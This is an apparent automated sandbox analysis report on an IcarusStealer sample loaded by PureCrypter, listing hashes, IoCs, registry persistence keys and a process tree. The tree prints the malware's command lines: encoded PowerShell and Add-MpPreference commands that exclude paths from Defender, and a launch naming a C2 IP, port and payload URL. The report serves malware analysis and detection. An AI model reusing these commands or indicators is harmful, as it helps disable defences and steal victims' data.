Analysis
-
max time kernel
81s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
11-02-2023 01:30
Static task
static1
Behavioral task
behavioral1
Sample
78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe
Resource
win10v2004-20220812-en
General
-
Target
78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe
-
Size
2.5MB
-
MD5
f3c821a1fbb4bcf479eeb1caac946127
-
SHA1
e0f7d21c82a9b497df1cdab3313fb48b4f8d6cec
-
SHA256
78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96
-
SHA512
43f7fb7b8c81c968b789a6622ee1c7a84ee3425dca104be70408848464cdc329f5e94f5a3c4a7df21c59f168f50d656c8e0d59a95d62e84c5d7bb1d8a2c97b6a
-
SSDEEP
24576:SE7fM8hdrNcPt9fSQyE32Ij6ztDUbuJ2SIB8fjPs+7px3st259FJb1neATEQyJGJ:SE3kPqQ7NgCSpNV18S/VeoEPQ6AJL
Malware Config
Extracted
icarusstealer
-
payload_url
https://raw.githubusercontent.com/HiddenEyeZ/tg/main/rt.jpg
Signatures
-
Detect PureCrypter injector 1 IoCs
resource yara_rule behavioral1/memory/1116-55-0x0000000004990000-0x0000000004C16000-memory.dmp family_purecrypter -
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\dlujbueugwr\\xutqkhvzvft.exe" 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe -
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\Gxraukwpbfy = "\"C:\\Users\\Admin\\AppData\\Roaming\\Tyxldzlixp\\Gxraukwpbfy.exe\"" 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1116 set thread context of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 240 set thread context of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 856 ipconfig.exe 1428 ipconfig.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1192 powershell.exe 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 456 powershell.exe 1820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeDebugPrivilege 2020 cvtres.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: 33 1980 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1980 AUDIODG.EXE Token: 33 1980 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1980 AUDIODG.EXE Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe Token: SeShutdownPrivilege 1656 explorer.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1116 wrote to memory of 112 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 27 PID 1116 wrote to memory of 112 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 27 PID 1116 wrote to memory of 112 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 27 PID 1116 wrote to memory of 112 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 27 PID 112 wrote to memory of 856 112 cmd.exe 29 PID 112 wrote to memory of 856 112 cmd.exe 29 PID 112 wrote to memory of 856 112 cmd.exe 29 PID 112 wrote to memory of 856 112 cmd.exe 29 PID 1116 wrote to memory of 660 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 30 PID 1116 wrote to memory of 660 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 30 PID 1116 wrote to memory of 660 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 30 PID 1116 wrote to memory of 660 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 30 PID 660 wrote to memory of 1192 660 cmd.exe 32 PID 660 wrote to memory of 1192 660 cmd.exe 32 PID 660 wrote to memory of 1192 660 cmd.exe 32 PID 660 wrote to memory of 1192 660 cmd.exe 32 PID 1116 wrote to memory of 892 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 33 PID 1116 wrote to memory of 892 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 33 PID 1116 wrote to memory of 892 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 33 PID 1116 wrote to memory of 892 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 33 PID 892 wrote to memory of 1428 892 cmd.exe 35 PID 892 wrote to memory of 1428 892 cmd.exe 35 PID 892 wrote to memory of 1428 892 cmd.exe 35 PID 892 wrote to memory of 1428 892 cmd.exe 35 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 1116 wrote to memory of 240 1116 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 36 PID 240 wrote to memory of 1656 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 38 PID 240 wrote to memory of 1656 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 38 PID 240 wrote to memory of 1656 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 38 PID 240 wrote to memory of 1656 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 38 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 240 wrote to memory of 2020 240 78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe 37 PID 1656 wrote to memory of 1188 1656 explorer.exe 40 PID 1656 wrote to memory of 1188 1656 explorer.exe 40 PID 1656 wrote to memory of 1188 1656 explorer.exe 40 PID 2020 wrote to memory of 1596 2020 cvtres.exe 41 PID 2020 wrote to memory of 1596 2020 cvtres.exe 41 PID 2020 wrote to memory of 1596 2020 cvtres.exe 41 PID 2020 wrote to memory of 1596 2020 cvtres.exe 41 PID 2020 wrote to memory of 1072 2020 cvtres.exe 44 PID 2020 wrote to memory of 1072 2020 cvtres.exe 44 PID 2020 wrote to memory of 1072 2020 cvtres.exe 44 PID 2020 wrote to memory of 1072 2020 cvtres.exe 44 PID 1596 wrote to memory of 1820 1596 cmd.exe 46 PID 1596 wrote to memory of 1820 1596 cmd.exe 46 PID 1596 wrote to memory of 1820 1596 cmd.exe 46 PID 1596 wrote to memory of 1820 1596 cmd.exe 46 PID 1072 wrote to memory of 456 1072 cmd.exe 47 PID 1072 wrote to memory of 456 1072 cmd.exe 47 PID 1072 wrote to memory of 456 1072 cmd.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe"C:\Users\Admin\AppData\Local\Temp\78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig/release2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:856
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig/renew2⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew3⤵
- Gathers network information
PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exeC:\Users\Admin\AppData\Local\Temp\78c31a1a4649c4fb7267fcadc7ab04612e2620f62a8c8b1b3064f9661d49ce96.exe2⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" HiddenEyeZ_Client 191.101.30.201 8081 CjGViQnrD3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:1188
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x1881⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5e73cd3ce60a69161b361e41a8babe85f
SHA14c9d9137e8c4ba97689f5b73ec93d340523109ab
SHA256ebf3eb4729b96e0179e092157bc1eacc254d45bd45bf13e84ec408e41fe83f84
SHA51253dd0e9f0810933e1a570b319a42f6345765d6e39f5828da644461b20d53042882bb759b098a0cfd4fc2ad55294968473c891f7ce9787040c7397ac736647e57